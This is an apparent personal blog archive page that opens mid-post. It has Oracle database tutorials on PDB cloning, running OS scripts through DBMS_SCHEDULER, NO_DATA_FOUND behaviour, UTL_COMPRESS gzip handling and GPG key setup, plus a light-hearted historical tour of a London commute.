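Based on the selections above, the generated statement should look something like this (a sketch only; the file paths are assumed from the BETA datafile locations we saw earlier) :

create pluggable database "ETA" from "BETA"
    file_name_convert = (
        '/opt/oracle/product/18c/dbhomeXE/XE/datafile/BETA',
        '/opt/oracle/product/18c/dbhomeXE/XE/datafile/ETA');

alter pluggable database "ETA" open read write;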

Go back to the Properties Tab and click Apply

We can see that we now have a node for the new PDB :

Simple things please simple minds :

By now it’s no surprise that the new PDB has the same non-oracle users as the PDB we’ve cloned :

Remember to ensure db will open on restart :

alter pluggable database eta save state;

Three databases for the price of one. That should keep me quiet for a bit.

Acknowledgements

As is so often the case, I found what I was looking for in an OracleBase article.

The answer to this AskTom question was also rather helpful in explaining why my PDBs weren’t starting when the database was.

My Commute through London

Tue, 2020-06-09 14:18

Don’t worry. The title isn’t an oblique reference to something technical so I’m not going to let you get halfway down the page and then start writing some indecipherable computer code.
Also, if you happen to be my Dad, some of what follows may be familiar as you grew up around here.
If you’re not then you’re not obliged to laugh at any gags I’ve worked in because they’re mainly for his benefit.

We’re going to go on a quick (pre-lockdown) tour through history and legend, following the route of what, until fairly recently, was my daily commute across London before catching the train to Milton Keynes. More or less.
Look, to be completely honest, we may be taking a couple of detours along the way. If you’re searching for the quickest route from Canary Wharf to Euston, well, this may not be it.
Neither will we be paying too much attention to some of the more famous landmarks that London has to offer.
Instead, we’ll be using the Tube Network to bounce back and forth through the centuries like a joyride in a TARDIS, taking a look at some of the City’s less obvious historical sites along the way.
Incidentally, if that idea does take your fancy, there’s a TARDIS parked in Earl’s Court Road.

Docklands

Our journey begins in the East of the City.
30 years ago, London’s Docklands were just another post-industrial wasteland. Since then, a new Financial District has arisen phoenix-like from the ruins. Canary Wharf now contains the UK Headquarters of a number of Financial institutions.

At its centre stands the skyscraper known as Canary Wharf Tower, or One Canada Square to give it its proper title.
Until the Shard came along, it was the tallest building in the United Kingdom.

A large erection in the middle of the Financial District. Who’d have thought ?

From here, we need to head west. We could opt to descend into the bowels of the earth and catch a Jubilee Line tube into the centre of the City.
Alternatively, we could wander over to the Crossrail Terminal and get there even quicker on the Elizabeth Line…well, maybe next year we can.
The Terminal itself is built and contains numerous shops, restaurants and even a roof garden. All that’s missing are the trains. They’ll be along soon. Well, soonish.

End on, the Terminal looks a bit like something that Thunderbird 2 would carry. You can just imagine the lower half opening to form a ramp for Thunderbird 4 to slide down silently into the murky waters of West India Quay…

THUNDERBIRDS ARE…running a replacement bus service

For now however, we’ll need to make use of an elevated section of the Docklands Light Railway (DLR) to carry us into the heart of the “Old” City.

The first calling point of note is Limehouse, which once formed part of the Parliamentary Constituency represented by Clement Attlee – Prime Minister from 1945 to 1951.
Attlee is remembered as one of (if not the) greatest peacetime Prime Ministers, largely due to his government’s creation of the Welfare State. Indeed, the National Health Service created in 1948 is one of the few things that Brits can still agree on as being a rather good idea.

One station further up the line we shift back about a decade into the midst of the Depression…

Just around the corner from Shadwell Station is Cable Street. The Legend of The Battle of Cable Street is that the working class residents of the area banded together and fought a battle which caused the Fascists to abandon their provocative plans to march through the heart of the East End.
The Battle of Cable Street has become a touchstone event in the history of British Socialism. Soon after the event, the support for the British Union of Fascists dissipated and they were never a force in British politics.
In Cable Street itself, there is now a mural depicting the event :

At this point in our journey, we have a choice of two termini. Given we’re not in any particular hurry, we can have a look at both. Let’s start with Tower Gateway.

Tower Hill

As you come out of the station, you find yourself in the middle of an awful lot of History.
Standing next to the iconic Tower Bridge, is the Tower of London – built by William the Conqueror as a none-too-subtle reminder to his new subjects that he wasn’t known as William the Bastard for nothing.

Through the crowds of tourists, it may be possible to spot more TV historians than you’d find on a Friday night on BBC4, all vying to do their piece-to-camera about events taking place here in their particular period of interest.
Yes, that may well be Dan Snow and David Starkey playing rock-paper-scissors to find out who gets to film once Lucy Worsley has finished her bit about the fate of some runner-up in a Tudor power struggle.
You may not spot Mary Beard because she’s wisely avoided the crush and has popped to the pub to meet up with David Olusoga. We’ll be following in Mary’s footsteps shortly.

First though, we should pay a quick visit to what is, for the moment at least, the City’s only public “statue” of a rather notable Prime Minister – Margaret Thatcher.
Statue is stretching it a bit. Maggie was always someone who polarised opinion, a fact which gives some context to this depiction of her on the Tower Hill Sundial

There is a salutary lesson here and one that will be re-enforced later in our odyssey through the City. If you want to be commemorated in statuary, then good PR is more important than good (or even notable) deeds.

For now though, if you’ve worked up a thirst with all this history, I know just the place. Just around the corner from the sundial is The Hung Drawn and Quartered.
Apart from the name, the pub is unusual in that it has this excerpt from Samuel Pepys’ diary on one of its outside walls :

Whilst we’re sitting outside the pub, enjoying our drinks in the uncharacteristic sunshine, we may reflect on the unusual shape of the skyline. Indeed, there seems to have been a shortage of spirit-levels in recent years as none of the newer skyscrapers seem to have straight sides that are the same height.
They do however, all have nicknames. There’s The Shard, The Cheese Grater, and the one that people are unaccountably relieved to learn, is known as The Pepper Pot.
From our current vantage point we can see another of this new breed – The Walkie-Talkie. Maybe architects frequent this pub as well as historians ? If so, we might form an alternative hypothesis to the spirit-level shortage theory…

looksh shtrait to me !

Before we get too comfortable – this is Central London after all and at these prices we can’t afford to make a night of it – we need to return to Shadwell. This time, we’ll try the other leg of the DLR, which takes us down to the deepest platforms on the tube network – Platforms 9 and 10 at Bank Station.

Bank

Bank is named after The Bank of England. Indeed, the station’s Central Line platforms are full of commuters at rush hour, most of whom are unaware that they are standing next to (and partially under) the Bank’s vaults.

Rather than speculating just how much gold is almost within touching distance, we’re going to a different tube line in the station.

The Waterloo and City line is probably the easiest railway line to navigate, as you’ll have to try quite hard to miss your stop.

Since 1898 this line has transported commuters between London’s traditional financial district and its busiest station.
Once at Waterloo, you may be tempted to pop out and take a quick glance at The London Eye – a giant ferris wheel that was built for the Millennium and is the first landmark to be destroyed in any disaster movie in which London appears, however briefly.
I’ve got no time for that however, I need to jump on the Jubilee Line and get across The River to…

Westminster

We emerge from Westminster Station at the North end of Westminster Bridge. We’re right next to the Houses of Parliament in fact. But hey, it’s not like we’re tourists or anything so rather than checking our watches against Big Ben, we can focus on the ladies in the chariot at the end of the bridge.
Here we have an object lesson in the value of positive public perception when it comes to being immortalised in bronze.
Boudicca – for she is the Charioteer in question – is famous for leading a rebellion against the Romans. She also left something of a mark when she last visited London.
In fact, archaeologists have found a layer of burnt debris from 62 A.D. when Boudicca went for an epic night on the town…and burned it to the bedrock.

From this formidable lady, we’re going to pop round the corner, sauntering past another individual who has benefited from centuries of positive spin.
King Richard (the Lionheart), is sitting there on his horse, right outside Parliament.
Richard spent only six months of his ten-year reign in England itself. The rest of the time was spent fighting costly foreign wars and being held for ransom on the way home by people he’d upset on the way to said wars. Essentially, his reign seems to have been a twelfth century version of lads on tour – go abroad somewhere hot, smash the place up and then get your relatives back home to stump up your bail money.

Eventually we arrive at one of the few public statues in the City that is probably more famous for the artist than the subject – Rodin’s Burghers of Calais.

Now, if you were so inclined, you might continue your journey up Whitehall, to Trafalgar Square, where Nelson sits atop his column and surveys the city. But some of us have a train to catch.
Returning to Westminster Station, we’re back on the Jubilee Line for a couple of stops until we alight at…

Baker Street

Baker Street Station is one of the oldest on the tube network, opening in 1863 as part of the then Metropolitan Railway.
221b Baker Street is, of course, the residence of Sherlock Holmes and references to the famous literary detective are prominent in the decor.
There are excerpts from some of the Sherlock Holmes stories on the Jubilee Line platforms…

…as well as some rather unusual decoration on the Bakerloo Line…

But wait – there is no 221b Baker Street and what’s more, there never has been. Some sleuthing is required to track down the actual whereabouts of the Great Man’s abode. Fortunately, it’s on our way…

Euston

The last leg of our journey takes us on the Hammersmith and City line to Euston Square, from where it’s a short walk to the main Euston Station and the train home to Milton Keynes.
But if we take a short detour down Gower Street we come across a familiar sight…

Cup of tea, Watson ?

This is the building that was used as 221b Baker Street in the Sherlock TV series starring Benedict Cumberbatch. It’s actually in North Gower Street.
As the blue plaque proclaims, it was once the home of Italian nationalist Giuseppe Mazzini.

All that remains now is to wander into Euston Station itself and hope that the trains are running OK.

Acknowledgements

Most of the photos I used here were taken by me at various times. There are a couple I got from Wikimedia Commons.
They are :

Running a shell script from inside an Oracle database using DBMS_SCHEDULER

Wed, 2020-05-27 12:11

As I write, various parts of the United Kingdom are still under variations of the theme of “lockdown”. Not that I’m stir crazy or anything, but I’ve now decided it’s time to explore one way of escaping, from the confines of my database at least.

Specifically I’m going to :

  • create an OS user on the database server
  • create an OS group to allow both the new user and the oracle user to access a common location
  • create a shell script owned by the OS user which writes to that common location
  • create a credential to access that user from inside the database itself
  • setup and run a scheduler job to execute a shell script as the new OS user
  • read the output file generated by the shell script from inside the database

For this exercise, I’m using my trusty 18cXE database running on CentOS…

Setting up the Linux User

Note that my database settings are defaulted so that, when my application needs to do anything on the OS ( e.g. read a file via an external table), it will do so as the OS user oracle.
This may be different on your database, especially if someone has specified a different user in the PDB_OS_CREDENTIAL parameter.
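If you’re not sure what applies on your database, you can check the parameter directly. A quick sketch; a null value means the default oracle OS user is in play :

select value
from v$parameter
where name = 'pdb_os_credential';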

First of all, I’m going to create a group :

sudo groupadd app_out

…and then the OS user (setting a password) …

sudo useradd -m xerunner
sudo passwd xerunner

…before assigning both the new xerunner and existing oracle users to the new group :

sudo usermod -aG app_out xerunner
sudo usermod -aG app_out oracle

I’ll now create a directory under $ORACLE_BASE and change the directory’s group to app_out, and ensure that group members have full access to the directory :

sudo su oracle
cd /opt/oracle
mkdir app_script_output

chgrp app_out app_script_output
chmod g+w app_script_output
ls -ld app_script_output
drwxrwxr-x 2 oracle app_out 6 May 24 21:32 app_script_output/

To test this, we can connect as the new xerunner user :

sudo su xerunner
touch /opt/oracle/app_script_output/silly.txt
ls -l /opt/oracle/app_script_output/silly.txt

-rw-rw-r-- 1 xerunner xerunner 0 May 24 21:36 silly.txt

Now for the shell script we’re going to call from inside the database. Just to demonstrate that the oracle user does not require execute permissions on the script, we’ll create it as xerunner in that user’s home directory. The script is called message.sh :

#!/bin/sh
/bin/echo "Help, I'm trapped inside this database!" >/opt/oracle/app_script_output/message.txt
exit 0

We can see that permissions are fairly restricted, with others (which includes oracle), having only read access :

ls -l /home/xerunner/message.sh 
-rwxrw-r-- 1 xerunner xerunner 114 May 24 21:42 /home/xerunner/message.sh

Now we’ve completed the setup on the OS, we need to return to the database.

Creating a credential

We need to create a Credential object in Oracle. This will allow us to connect to the database server as xerunner without having to know any of the gory details ( such as the user’s password).
Back in the olden days (when only cats did social distancing), credential management was handled in the DBMS_SCHEDULER package.
Since 12c, the DBMS_CREDENTIAL package has assumed this role.

First up, let’s create our credential :

begin
    dbms_credential.create_credential(
        credential_name => 'myapp_ext_jobs',
        username => 'xerunner',
        password => 'super secret password');
end;
/

…where super secret password is the password for the xerunner user on the OS.

You can include a comment when creating a credential. In hindsight, that might have been a good idea.
Fortunately, I can edit the credential rather than having to drop and re-create it…

begin
    dbms_credential.update_credential( 
        credential_name => 'myapp_ext_jobs', 
        attribute => 'comments', 
        value => 'OS User to execute shell scripts from scheduler jobs');
end;
/

I can see details of my credentials by querying the appropriate data dictionary view :

select username, comments
from user_credentials
where credential_name = 'MYAPP_EXT_JOBS';

USERNAME        COMMENTS                                               
--------------- -------------------------------------------------------
xerunner        OS User to execute shell scripts from scheduler jobs   

One other point to note, in the aforementioned olden days, it was possible to retrieve the password of a credential by using DBMS_ISCHED.GET_CREDENTIAL_PASSWORD. See Martin Berger’s explanation here for details.

In 18c however, this is no longer the case.

Running the shell script from a Scheduler Job

Scheduler jobs are extremely useful for doing all sorts of things, not just running – well – scheduled jobs.
In this case we want to run the shell script. To do this, we first create a job :

begin
    dbms_scheduler.create_job(
        job_name => 'my_external_job',
        job_type => 'EXECUTABLE',
        job_action => '/home/xerunner/message.sh',
        credential_name => 'MYAPP_EXT_JOBS',
        auto_drop => false,
        enabled => true);
end;
/

… and now we can run it :

begin
    dbms_scheduler.run_job( 'my_external_job');
end;
/

Note that, by default, RUN_JOB executes the specified job in the current session – i.e. in the foreground.
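Before we go looking for the output file, we can ask the scheduler how the run went. A quick sketch against the run details view :

select log_date, status, error#, additional_info
from user_scheduler_job_run_details
where job_name = 'MY_EXTERNAL_JOB'
order by log_date desc;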
We can check that the job has been successful by connecting to the OS and looking in the appropriate directory….but that’s boring. Let’s have a look without leaving the comfort of our database.

Reading the file

First, we need to create a directory object for the OS directory in question. This shouldn’t be a problem because we already know that the oracle OS user has permissions on the directory on the OS :

create directory app_script_out
    as '/opt/oracle/app_script_output'
/

Then we can just read the file :

declare
    fdir all_directories.directory_name%type := 'APP_SCRIPT_OUT';
    fname varchar2(128) := 'message.txt';
    fh utl_file.file_type;
    buf varchar2(32767);
    
    fexists boolean;
    flen number;
    bsize number;
    
begin
    -- Make sure the file is where we think it is before we try to open it...
    utl_file.fgetattr( fdir, fname, fexists, flen, bsize);
    if not fexists then
        raise_application_error(-20000, q'[Hold up, the file isn't there]');
    end if;
    
    fh := utl_file.fopen(fdir, fname, 'r', 32767);
    begin
        -- Read and print each line in a nested block.
        -- NO_DATA_FOUND will be raised when we hit the end of the file
        loop
            utl_file.get_line(fh, buf, 32767);
            dbms_output.put_line(buf);
        end loop;
    exception when no_data_found then
        dbms_output.put_line('End of file reached');
        utl_file.fclose(fh);
    end;
end;
/

Help, I'm trapped inside this database!
End of file reached


PL/SQL procedure successfully completed.

No Data ? No Problem ! Fun and Games with the NO_DATA_FOUND exception

Wed, 2020-05-06 14:29

I can’t remember how long we’ve been in lockdown now but between you and me, I think my Oracle Database may be cracking up.
As Exhibit A, I present the fact that the RDBMS seems to raise the NO_DATA_FOUND exception only when it feels like it…

Rotate the Pod please, HAL

NO_DATA_FOUND is one of Oracle’s built-in exceptions and is raised when your code encounters an ORA-01403 : no data found error.
It’s often associated with a select into clause, as this construct will (should) return a single row.
If it doesn’t, it should raise either a TOO_MANY_ROWS or a NO_DATA_FOUND exception, depending on whether it found multiple rows or none at all…

set serverout on size unlimited
clear screen

declare
    mystring varchar2(100);
begin
    select 'I am completely operational, and all my circuits are functioning perfectly'
    into mystring
    from dual
    where 1 = 2;
end;
/

Run this and you will get the aforementioned error :

ORA-01403: no data found
Open the Pod Bay doors, HAL

Let’s go right ahead and create a function with this code :

create or replace function stir_crazy return varchar2 is
    mystring varchar2(100);
    begin
        select 'I am completely operational, and all my circuits are functioning perfectly'
        into mystring
        from dual
        where 1 = 2;
        
        return mystring;
end stir_crazy;
/

We’ve not added any exception handling in the function, so the error should propagate back to the caller…

select nvl(stir_crazy, q'[I'm afraid I can't do that, Dave]') as stir_crazy from dual;

STIR_CRAZY                              
----------------------------------------
I'm afraid I can't do that, Dave

That’s right. Rather than raising an ORA-01403 error, Oracle has simply returned NULL.
Have I just made some silly mistake in the code ? Let’s check. This time, we’ll handle the exception, if it’s raised…

begin
    if stir_crazy is null then
        dbms_output.put_line('Daisy, Daisy, give me your answer, do !');
    else
        dbms_output.put_line('Just what do you think you''re doing, Dave ?');
    end if;
exception when no_data_found then
    dbms_output.put_line(q'[I've still got the greatest enthusiasm and confidence in the mission]');
end;
/

Run this and we can see that the exception is now raised…

I've still got the greatest enthusiasm and confidence in the mission


PL/SQL procedure successfully completed.
I’ve just picked up a fault in the AE-35 unit

It turns out that Oracle has always behaved in this way.

According to this explanation, NO_DATA_FOUND is not an error when encountered from SQL, merely an “exceptional condition”.

I honestly think you ought to sit down calmly, take a stress pill, and think things over

This may be no more than an interesting quirk, depending on what is considered as SQL in this context…

As an example, let’s look at the HR.COUNTRIES table :

select country_id, country_name, region_id
from countries;

COUNTRY_ID      COUNTRY_NAME                         REGION_ID
--------------- ------------------------------ ---------------
AR              Argentina                                    2
AU              Australia                                    3
BE              Belgium                                      1
BR              Brazil                                       2
CA              Canada                                       2
CH              Switzerland                                  1
CN              China                                        3
DE              Germany                                      1
DK              Denmark                                      1
EG              Egypt                                        4
FR              France                                       1
IL              Israel                                       4
IN              India                                        3
IT              Italy                                        1
JP              Japan                                        3
KW              Kuwait                                       4
ML              Malaysia                                     3
MX              Mexico                                       2
NG              Nigeria                                      4
NL              Netherlands                                  1
SG              Singapore                                    3
UK              United Kingdom                               1
US              United States of America                     2
ZM              Zambia                                       4
ZW              Zimbabwe                                     4

25 rows selected. 

The REGION_ID references the REGIONS table :

select region_id, region_name
from regions;

 REGION_ID REGION_NAME                   
---------- ------------------------------
         1 Europe                        
         2 Americas                      
         3 Asia                          
         4 Middle East and Africa        

…and we have a lookup function to return the Region Name for each ID value…

create or replace function get_region_name( i_region_id in regions.region_id%type)
    return regions.region_name%type
is
    rtn regions.region_name%type;
begin
    select region_name into rtn
    from regions
    where region_id = i_region_id;
    
    return rtn;
end;
/

Now let’s add in a record that includes a region_id value that will not be found by the function
(yes, I have disabled the Foreign Key that would normally prevent this)…

insert into countries( country_id, country_name, region_id)
values( 'NZ', 'New Zealand', 5);

As we’ve already observed, calling the function from SQL will simply cause a null value to be returned…

select country_name, get_region_name( region_id) as region_id
from countries
where country_id = 'NZ';

COUNTRY_NAME                   REGION_ID      
------------------------------ ---------------
New Zealand                                   

If we now call the function from inside a PL/SQL block, we might expect NO_DATA_FOUND to make an appearance…

set serverout on size unlimited
begin
    for r_countries in (
        select country_name, get_region_name( region_id) as region_id
        from countries)
    loop
        dbms_output.put_line( r_countries.country_name||' Region : '||r_countries.region_id);
    end loop;
end;
/

or possibly not…

Argentina Region : Americas
Australia Region : Asia
Belgium Region : Europe
Brazil Region : Americas
Canada Region : Americas
Switzerland Region : Europe
China Region : Asia
Germany Region : Europe
Denmark Region : Europe
Egypt Region : Middle East and Africa
France Region : Europe
Israel Region : Middle East and Africa
India Region : Asia
Italy Region : Europe
Japan Region : Asia
Kuwait Region : Middle East and Africa
Malaysia Region : Asia
Mexico Region : Americas
Nigeria Region : Middle East and Africa
Netherlands Region : Europe
Singapore Region : Asia
United Kingdom Region : Europe
United States of America Region : Americas
Zambia Region : Middle East and Africa
Zimbabwe Region : Middle East and Africa
New Zealand Region :


PL/SQL procedure successfully completed.

However, if we call the function from a PL/SQL statement then we get a different result :

set serverout on size unlimited
begin
    for r_countries in (
        select country_name, region_id
        from countries)
    loop
        dbms_output.put_line( r_countries.country_name||' Region :'||get_region_name( r_countries.region_id));
    end loop;
end;
/

ORA-01403: no data found
ORA-06512: at "MIKE.GET_REGION_NAME", line 6

Looks like I’m the one cracking up.
The moral of the story ? Don’t rely on NO_DATA_FOUND being raised unless you are executing a PL/SQL statement.
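One way to avoid being caught out is to handle NO_DATA_FOUND inside the lookup function itself and make the outcome explicit. Here’s a sketch, returning a hypothetical placeholder value rather than leaving the caller to guess :

create or replace function get_region_name( i_region_id in regions.region_id%type)
    return regions.region_name%type
is
    rtn regions.region_name%type;
begin
    select region_name into rtn
    from regions
    where region_id = i_region_id;

    return rtn;
exception when no_data_found then
    -- decide here what a missing region means, rather than relying on
    -- whether the caller happens to be SQL or PL/SQL
    return 'UNKNOWN REGION';
end;
/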

To Boldly gzip from PL/SQL

Tue, 2020-04-28 15:10

Lempel-Ziv. Sounds like something you might find on a starship. I mean, you can just imagine Scotty telling Kirk that they can’t go to warp because the Lempel-Ziv compressors are offline.
In fact, the Lempel-Ziv algorithm is what GNU’s Gzip program uses to compress files.
Fortunately, the UTL_COMPRESS package employs the same algorithm, which means that you can create archives using one tool that can be manipulated by the other…
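Before we get to files, a quick round-trip shows the package in action. A minimal sketch, assuming the RAW overloads of LZ_COMPRESS and LZ_UNCOMPRESS (and SERVEROUTPUT enabled) :

set serverout on
declare
    v_src      raw(100) := utl_raw.cast_to_raw('Beam me up');
    v_zipped   raw(200);
    v_unzipped raw(200);
begin
    -- compress the string, then uncompress it again and prove we get the original back
    v_zipped   := utl_compress.lz_compress(v_src);
    v_unzipped := utl_compress.lz_uncompress(v_zipped);
    dbms_output.put_line(utl_raw.cast_to_varchar2(v_unzipped));
end;
/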

Starfleet HR have generated a delimited file of their Captains from their Oracle database for loading into their data mart, which runs on a different server ( and doesn’t use Oracle).
This file needs to be compressed to make the transfer as efficient as possible.
At present, the file looks like this on the database server :

ls -l starfleet_captains.csv
-rw-r--r-- 1 oracle oinstall 343 Apr 26 15:49 starfleet_captains.csv
Compressing the file

Using UTL_COMPRESS, we can easily create a .gz archive from the file…

declare
    l_dir all_directories.directory_name%type := 'APP_FILES';
    fname varchar2(100) := 'starfleet_captains.csv';

    src_file bfile;
    lz_compressed blob;
    lz_compressed_len integer;
    fh utl_file.file_type;
    
    v_buffer raw(32767);
    buf_size pls_integer := 32767;
    v_pos integer := 1;
begin

    src_file := bfilename( l_dir, fname);
    dbms_lob.fileopen(src_file, dbms_lob.file_readonly);
    
    lz_compressed := utl_compress.lz_compress( src_file, 9); 
    lz_compressed_len := dbms_lob.getlength( lz_compressed);
    
    fh := utl_file.fopen( l_dir, fname||'.gz', 'wb');
    
    while v_pos < lz_compressed_len loop
        dbms_lob.read( lz_compressed, buf_size, v_pos, v_buffer);
        utl_file.put_raw( fh, v_buffer, true);
        v_pos := v_pos + buf_size;
    end loop;
    utl_file.fclose(fh);
    dbms_lob.fileclose(src_file);
    -- Now need to delete original
    utl_file.fremove(l_dir, fname);
end;
/

The LZ_COMPRESS function accepts two arguments. The first is the file we’re compressing.
The second is the “quality” – a number between 1 and 9 with 1 being the fastest execution, but least compression, and 9 being the greatest compression and the slowest execution.
We’ll come back to that shortly.
In the meantime, we can see that our delimited file has now been replaced with a compressed file…

ls -l starfleet_captains*
-rw-r--r-- 1 oracle oinstall 242 Apr 26 15:58 starfleet_captains.csv.gz

…which can now be manipulated using gzip…

gzip -l starfleet_captains.csv.gz 
         compressed        uncompressed  ratio uncompressed_name
                265                 343  34.7% starfleet_captains.csv

…and indeed, gunzip…

gunzip starfleet_captains.csv.gz

cat starfleet_captains.csv

CAPTAIN|SHIP
Archer|Enterprise NX-01
Hernandez|Columbia NX-02
Decker|USS Enterprise
Georgiou|USS Shenzou
Kirk|USS Enterprise
Lorca|USS Discovery
Pike|USS Enterprise
Styles|USS Excelsior
Terrell|USS Reliant
Tracey|USS Exeter
Adams|USS Heart of Gold
Janeway|USS Voyager
Picard|USS Stargazer
Sisko|USS Defiant
Thomas|USS Puget Sound
ROW_COUNT|15

Incidentally, some of this data does raise questions.
For example, what’s so special about Puget Sound that it gets a Starship as well as an Oracle User Group ?
Also, was Janeway overlooked for the command of the Heart of Gold because she’s not a tea drinker ?
Full disclosure : that wasn’t my geeky reference to Hitchhiker’s Guide to the Galaxy. I got these ships and captains from a Star Trek Wiki.

Coming back to more immediate questions, how does UTL_COMPRESS perform with different compression settings for larger files…

Performance test

Let’s generate a more substantial file (using William Robertson’s CSV package)…

declare
    rc sys_refcursor;
begin
    open rc for
        select rownum as id,
            case mod( rownum, 8) 
                when 1 then 'Archer'
                when 2 then 'Pyke'
                when 3 then 'Georgiou'
                when 4 then 'Lorca'
                when 5 then 'Kirk'
                when 6 then 'Picard'
                when 7 then 'Sisko'
                when 0 then 'Janeway'
            end as captain,
            case mod(rownum, 8)
                when 1 then 'Enterprise NX-01'
                when 2 then 'USS Enterprise'
                when 3 then 'USS Shenzou'
                when 4 then 'USS Discovery'
                when 5 then 'USS Enterprise'
                when 6 then 'USS Stargazer'
                when 7 then 'USS Defiant'
                when 0 then 'USS Voyager'
            end as ship
        from dual
        connect by rownum < 1000000;
    
    csv.write_file( 
        p_dataset => rc,
        p_separator => chr(124),
        p_heading => 'Y',
        p_rowcount => 'Y',
        p_directory => 'APP_FILES',
        p_filename => 'famous_federation_captains.csv');
end;
/

If we look at the file on disk, we can see that it’s hefty enough for our purposes :

ls -lh famous_federation_captains.csv
-rw-r--r-- 1 oracle oinstall 27M Apr 27 17:31 famous_federation_captains.csv

To start with, let’s try compressing this using the default value for quality (6) :

set timing on
set feedback on
declare
    l_dir all_directories.directory_name%type := 'APP_FILES';
    fname varchar2(100) := 'famous_federation_captains.csv';

    src_file bfile;
    lz_compressed blob;
    lz_compressed_len integer;
    fh utl_file.file_type;
    
    v_buffer raw(32767);
    buf_size pls_integer := 32767;
    v_pos integer := 1;
begin

    src_file := bfilename( l_dir, fname);
    dbms_lob.fileopen(src_file, dbms_lob.file_readonly);
    
    lz_compressed := utl_compress.lz_compress( src_file); 
    lz_compressed_len := dbms_lob.getlength( lz_compressed);
    
    fh := utl_file.fopen( l_dir, fname||'.gz', 'wb');
    
    while v_pos < lz_compressed_len loop
        dbms_lob.read( lz_compressed, buf_size, v_pos, v_buffer);
        utl_file.put_raw( fh, v_buffer, true);
        v_pos := v_pos + buf_size;
    end loop;
    utl_file.fclose(fh);
    dbms_lob.fileclose(src_file);
    -- Now need to delete original
    utl_file.fremove(l_dir, fname);
end;
/

The output is :

PL/SQL procedure successfully completed.

Elapsed: 00:00:00.329

If we examine the compressed file, we can see that the compression ratio is around 90% :

ls -lh famous_federation_captains.csv.gz 
-rw-r--r-- 1 oracle oinstall 2.7M Apr 27 17:37 famous_federation_captains.csv.gz
gzip -l famous_federation_captains.csv.gz 
         compressed        uncompressed  ratio uncompressed_name
            2779405            27388901  89.9% famous_federation_captains.csv

Trying this with the quality value set to the minimum (1) :

...
lz_compressed := utl_compress.lz_compress( src_file, 1); 
...

…results in a faster runtime…

PL/SQL procedure successfully completed.

Elapsed: 00:00:00.202

…but a marginally bigger file…

 ls -lh famous_federation_captains.csv.gz 
-rw-r--r-- 1 oracle oinstall 2.9M Apr 27 17:43 famous_federation_captains.csv.gz
gzip -l famous_federation_captains.csv.gz 
         compressed        uncompressed  ratio uncompressed_name
            2994045            27388901  89.1% famous_federation_captains.csv

Finally, let’s go for the maximum quality setting (9) :

...
lz_compressed := utl_compress.lz_compress( src_file, 9); 
...

The runtime is a little longer…

PL/SQL procedure successfully completed.

Elapsed: 00:00:00.393

…and the resulting file is more or less the same as for the default :

ls -lh famous_federation_captains.csv.gz 
-rw-r--r-- 1 oracle oinstall 2.7M Apr 27 17:47 famous_federation_captains.csv.gz
gzip -l famous_federation_captains.csv.gz 
         compressed        uncompressed  ratio uncompressed_name
            2762750            27388901  89.9% famous_federation_captains.csv

Obviously, this is a limited test. I’m running Oracle 18cXE on CentOS. However, it may become a consideration for you if you’re either tight on space or need to speed up your compression job.

Uncompressing GZIPPED files

As we’ve seen, UTL_COMPRESS can produce files that are compatible with GZIP. But can it read files that have been compressed using GZIP ?

Let’s take a look :

 
gzip captains_log.txt
ls -l captains_log.txt.gz 
-rw-rw-rw- 1 oracle oinstall 561 Apr 27 18:00 captains_log.txt.gz

Want to read the Captain’s log ?

set serverout on size unlimited
clear screen
declare
    l_dir all_directories.directory_name%type := 'APP_FILES';
    fname varchar2(100) := 'captains_log.txt.gz';
    zipped_file bfile;
    v_unzipped blob := empty_blob();
    v_text clob;
    
    v_dest_offset integer := 1;
    v_src_offset integer := 1;
    v_lang integer := dbms_lob.default_lang_ctx;
    v_warn integer;
begin
    zipped_file := bfilename( l_dir, fname);
    dbms_lob.fileopen(zipped_file, dbms_lob.file_readonly);

    v_unzipped := utl_compress.lz_uncompress( zipped_file);
    dbms_lob.fileclose(zipped_file);
    -- Now we have the uncompressed contents of the file, let's print it out...
    
    dbms_lob.createtemporary( v_text, true);
    
    dbms_lob.converttoclob(
        dest_lob => v_text,
        src_blob => v_unzipped,
        amount => dbms_lob.lobmaxsize,
        dest_offset => v_dest_offset,
        src_offset => v_src_offset,
        blob_csid => dbms_lob.default_csid,
        lang_context => v_lang,
        warning => v_warn);
   
    dbms_output.put_line(v_text);     

    dbms_lob.freetemporary( v_text);
end;
/

Run this and Kirk’s inner-most thoughts (or possibly the lyrics to Star Trekking by The Firm) are there for all to see…

Acknowledgements

Despite appearances, I do actually do some research before kicking out this stuff.
On this occasion, the following links were of some assistance :

Secrecy and (file) Corruption – diving into the murky world of GPG encryption

Sat, 2020-04-18 10:19

Transferring sensitive data between systems often requires some form of encryption to ensure that the data is protected from prying eyes.
One common method of achieving this is to use Gnu Privacy Guard (GPG).
What I’m going to look at here is :

  • Creating GPG keys on a server
  • Using a Public Key to encrypt data on a different machine
  • Decrypting an encrypted message
  • Things to try if you get some of the more wacky GPG error messages

If you’ve stumbled on this post because of the last of these, you’re in good company. I’m sure someone intimately familiar with this tool will instantly know the meaning of the error message “Ohhhh jeeee: mpi larger than packet” but as far as I’m concerned, it may as well have read “Divide by Cucumber Error”.
Hopefully, things will become clearer down the page…

Creating a GPG key

In fact, we’ll be creating two keys. The Public Key is, as its name suggests, generally available and anyone wanting to send us a message need only use that key to encrypt it.
The Private key is the one that only we have access to and which we can use to decrypt files encrypted with the Public Key.

To create the keys, we need to be on the server that will receive these files.
Once there, we simply run :

gpg --gen-key

which results in :

NOTE – according to the manual, the default settings are sufficient in most cases so accept them unless you have a specific reason to change them.
For the length of time the key is valid, enter “0” if you don’t want it to expire.
In this case, I’ve selected 7 days.
GPG should now prompt you for a passphrase.
NOTE – it’s really important that you remember the passphrase as otherwise you will not be able to decrypt any messages :

Finally, the keys will be generated :

Distributing the Public Key

Before we go any further, we probably want to obtain a text version of our public key that we can then distribute.
This can be accomplished by running :

gpg --armour --export me@silly.com >ponder_stibbons_public_key.txt

We now have a file that contains our Public Key. It looks like this :

I can now distribute this to anyone who wants to send me an encrypted message.

Using a Public Key to encrypt data on a different machine

I’m now on a different machine onto which I’ve downloaded the public key.
I now need to import it :

gpg --import ./ponder_stibbons_pubkey.txt 

…which returns…

gpg: key 1DA0A003: public key "Ponder Stibbons (Test generation of a GPG key) <ponders@uu.ac.am>" imported
gpg: Total number processed: 1
gpg:               imported: 1  (RSA: 1)

I can get a list of available keys by running :

gpg --list-keys

…which confirms that the key is now present in my keyring :

/home/mike/.gnupg/pubring.gpg
-----------------------------
pub   2048R/1DA0A003 2020-04-09 [expires: 2020-04-16]
uid                  Ponder Stibbons (Test generation of a GPG key) <ponders@uu.ac.am>
